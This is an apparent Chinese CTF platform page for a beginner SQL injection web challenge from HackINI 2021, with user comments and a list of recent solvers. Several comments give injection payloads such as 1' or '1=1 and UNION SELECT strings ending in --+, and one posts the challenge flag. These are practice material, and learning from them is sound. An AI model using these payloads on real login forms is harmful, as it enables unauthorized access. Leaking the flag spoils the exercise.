my-first-sqliWEB 未解决

分数: 0 金币: 0
所属赛事: HackINI 2021
题目作者: 未知
一  血: Aman
一血奖励: 0金币
解  决: 6317
提  示:
描  述:
My First SQL injection!!
评论
yituoshi 2年前

Half the truth is often a big lie:shellmates{SQLi_goeS_BrrRR}

回复 0

2200394635 2年前

直接最简单的 1' or '1=1

回复 2

wclc 2年前

为什么注释要用--+才可以,我用的#爆不出来

回复 0
adminhrp 2年前

可能是版本或者sql应用不同,这里用--也可以实现,2个玩意都是sql注释

回复 0

18583024570 2年前

判读闭合符就能出来

回复 0

Y4n9 2年前

1'union select 1,2 --+,密码随便写,通过union select联合查询,看有无回显点

回复 0

hesh 2年前

1' union select * from users order by 2 --+ 密码框随便填一个

回复 1

战斗到底 2年前

sqlmap

回复 0

简单一点点 2年前

1' union select 1,2--+ 就出结果了,还没搞明白为啥。。。

回复 2

Am0s 2年前

简简单单~~

回复 0

愿你手拥幸福 2年前

把这道题想的太正常了,导致一下子给我大脑CPU干烧了,才发现这题没做啥防护

回复 0

WriteUp

image
thb143

0 金币

评分(10)

解题动态

dongyin 攻破了该题 4小时前
yang122 攻破了该题 5小时前
yehua123 攻破了该题 5小时前
biu2630 攻破了该题 6小时前
13580844692 攻破了该题 7小时前
zcclub 攻破了该题 12小时前
wangheng 攻破了该题 13小时前
---snow--- 攻破了该题 13小时前
YangZoe 攻破了该题 1天前
温吞世俗人间烟火 攻破了该题 1天前
萦梦Sora~ 攻破了该题 1天前
daggerzhou 攻破了该题 1天前
19941759966 攻破了该题 1天前
16635888806 攻破了该题 2天前
余川 攻破了该题 2天前
半路出家 攻破了该题 2天前
13monster 攻破了该题 2天前
heiye123 攻破了该题 3天前
cbctf 攻破了该题 3天前
哇卡哇卡 攻破了该题 3天前
问题反馈